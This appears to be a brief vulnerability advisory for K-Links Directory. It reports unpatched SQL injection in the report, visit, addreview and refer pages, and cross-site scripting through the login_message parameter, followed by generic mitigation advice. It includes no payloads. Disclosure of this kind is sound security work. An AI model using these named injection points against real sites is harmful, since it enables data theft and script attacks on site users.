vendor: K-Links Directory
by: Corwin
CVSS: 7.5 HIGH
SQL-INJECTION, XSS
CWE: 89, 79
Product Name: K-Links Directory
Affected Version From: All
Affected Version To: All
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
K-Links Directory SQL-INJECTION, XSS
K-Links Directory is vulnerable to SQL injection and XSS. An attacker can exploit the SQL injection vulnerability by sending a malicious SQL query to the vulnerable parameter in the report, visit, addreview and refer pages. An attacker can also exploit the XSS vulnerability by sending a malicious script to the login_message parameter in the index page.
Mitigation:
Input should be validated to prevent SQL injection and XSS attacks. The application should also be tested for any other security vulnerabilities.